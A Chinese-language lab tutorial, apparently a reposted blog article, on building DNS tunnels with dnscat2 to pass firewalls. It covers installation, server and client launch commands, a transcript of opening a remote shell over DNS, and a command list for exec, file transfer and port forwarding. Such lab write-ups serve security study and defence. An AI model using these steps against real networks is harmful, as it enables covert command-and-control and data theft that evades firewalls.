0x01 前言
??DNS是用來做域名決議的,是連接互聯網的關鍵,故即使是企業內網,在防火墻高度關閉下,也有著很好的連通性,但是黑客卻可以通過將其他協議的內容封裝再DNS協議中,然后通過DNS請求和回應來傳輸資料和完成控制,
0x02 DNS隧道的方式
目前DNS隧道目前按照連接方式來分:直連隧道和中繼隧道,
??直連隧道:用戶直接和控制服務器通過DNS連接,由于直連不經過其他DNS服務器,所以速度快,但是很多用戶是對DNS服務器是有配置要求的,只能配置特定的服務器,配置其他的DNS服務器不準許;另外這種方式由于直接連接的,很容易暴漏攻擊服務器,
??中繼隧道:利用DNS迭代查詢方式,中間通過多個DNS服務器的跳轉,跳轉到最終的控制機,整個決議程序更長,所以性能沒有直連好,還要防止DNS快取,
??在兩種DNS 隧道中,用的最多的是中繼方式,能讓DNS服務器做遞回查詢,則需要每次查詢均采用不同域名的,一句話是每次采用新域名的方式來保證走DNS查詢,有較高的隱蔽性,
??同時在大多數滲透場景中服務器端是無法連接到內網客戶端的,因為防火墻或NAT內網原因,所以多是通過客戶端定時連接服務器端來保持狀態,
??本次實驗中,我們的關注點在Dnscat2所搭建的DNS隧道,故不作方式上的研究,
0x03 整體環境
??本次我們采用攻擊機-Windows DNS服務器-內網機,由于是DNS隧道,故防火墻全開并不受影響,
攻擊機Kali
IP:10.10.10.10
DNS:10.10.10.100
Windows Service DNS服務器:
域名:www.qianxin.com IN NS ns.baidu.com ns.baidu.com IN A 10.10.10.20
內網機Kali:已開啟防火墻
IP:10.10.10.20
DNS:10.10.10.100
0x04 安裝部署
服務端配置
??安裝ruby,下載dnscat2,配置服務端依賴環境,通過ruby ./dnscat2.rb測驗是否安裝成功,
#linux下服務器端安裝
#安裝ruby
yum install ruby #服務器端為ruby開發,所以需要先安裝ruby才可以運行
git clone https://github.com/iagox86/dnscat2.git /opt/DNSCAT2/ #下載
cd dnscat2/server/ #進入服務端目錄
gem install bundler #安裝bindle捆綁程式
sudo bundle install #bundle運行限制在非root用戶下,不過可以sudo進行root下安裝
ruby ./dnscat2.rb
??如果不以root用戶身份運行它,則可能無法偵聽UDP / 53(可以使用--dnsport進行更改),如果是這樣,您會看到一條錯誤訊息,
客戶端配置
??編譯客戶端應該非常簡單-只需編譯make / gcc(對于Linux)或Cygwin或Microsoft Visual Studio(對于Windows)即可,這是Linux上的命令:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/client/
make #編譯
./dnscat 測驗
??到這里的話,服務端和客戶端基本上都配置好了,不過部分環境可能會出現依賴缺少的情況,通過以下命令可以補全
#缺了不少庫采用以下方式安裝
gem install ecdsa
gem install sha3
gem install salsa20
gem install trollop
gem install trollop
0x05 操作使用
??首先,先啟動服務端,服務端會進行監聽埠
ruby ./dnscat2.rb ns.baidu.com --secret=hopeamor --no-cache
語言 程式 委派域名 密碼
??再啟動客戶端,此處先啟動同樣可行,不過需要注意的是–dns server=www.baidu.com不可以填寫成ns.baidu.com,這里的引數是決議dns權威服務器,而不是上級委派服務器,
./dnscat --dns server=www.baidu.com --secret=hopeamor
程式
??接下來,我們在服務端輸入如下命令即可
#進入互動狀態
session -i 1
#輸入shell進入互動
command (localhost.localdomain) 1> shell
Sent request to execute a shell
command (localhost.localdomain) 1> New window created: 2
Shell session created!
#看下shell資訊
dnscat2> windows
0 :: main [active]
crypto-debug :: Debug window for crypto stuff [*]
dns1 :: DNS Driver running on 0.0.0.0:53 domains = [*]
1 :: command (localhost.localdomain) [encrypted and verified]
2 :: sh (localhost.localdomain) [encrypted and verified] [*]
#切換到shell
dnscat2> session -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!
#輸入命令:
sh (localhost.localdomain) 2> pwd
sh (localhost.localdomain) 2> /home/test/dns2cat/dnscat2/client
??這時已經完成了連接,跳轉至客戶端可以看到已經成功連接上了,
??我們在服務端輸入ifconfig進行測驗,可以看到客戶端資訊,當然,可以做很多事情,
??連接之后有諸多命令,以下記錄了各個命令的使用,在command中使用?調出幫助,
quit(退出控制臺)
kill <id>(中斷通道)
set(設定,比如設定security=open)
windows(列舉出所有的通道)
window -i <id>(連接某個通道)或者使用session -i <id>
clear(清屏)
delay(修改遠程會話超時時間)
exec(執行遠程機上的程式)
shell(得到一個反彈shell,此處必須在1::command(kali)中使用)
download/upload(兩端之間上傳下載檔案)
supend(回傳到上一層,快捷鍵ctrl+z即可)
listen <本地埠> <控制端IP/127.0.0.1>:<埠>(埠轉發,此處)(此處必須在1::command(kali)中使用)
加注:
??本人在使用時,配置好的NS域名卻在資料中發現走的是直連模式,也就是攻擊機到受害機的DNS協議,結果發現是客戶端命令用的直連模式,此處使用中繼命令即可,不同的是直連命令下,只能只有ip或a決議,但中繼模式下卻能進行ns決議的二級域名,并且直連和中繼是互通的,
服務端命令:
#啟動
sudo ruby./dnscat2.rb ns.abc.com --secret=123456 #方式1【常用】中繼模式
sudo ruby./dnscat2.rb --dns server=127.0.0.1,port=533,type=TXT --secret=123456 #方式2直連模式
sudo ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache #方式3中繼
客戶端命令:
dnscat --secret=123456 abc.com #對應 方式1中繼模式
dnscat --dns server=<your dnscat2 server ip>,port=553,type=TXT #對應 方式2,注意使用--dns選項時,port不可省,否則可能連不上,直連模式
–secret 定義了通訊密碼,
兩端使用時,均需跟上該密碼,可防止中間人攻擊,如果不加,dnscat2會生成一個隨機字串,記得拷貝下來在啟動客戶端時使用,
同時服務端在運行時,也可通過set secret=<new value>來動態改變
–security 規定了安全級別
默認情況下,客戶端和服務器都支持并會嘗試加密,Open表示服務端允許客戶端不加密,這樣,客戶端就可以通過傳遞–no-encryption引數來禁用加密,當然也可以在編譯時,就禁用客戶端加密:make nocrypto,
同時服務端在運行時,也可通過set security=open來動態改變,
–no-cache 禁止快取
使用powershell-dnscat2客戶端時,務必在運行服務器時添加無快取選項,因為與dnscat2服務器的caching模式不兼容,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/471805.html
標籤:其他
下一篇:華為機試題-計算字符出現次數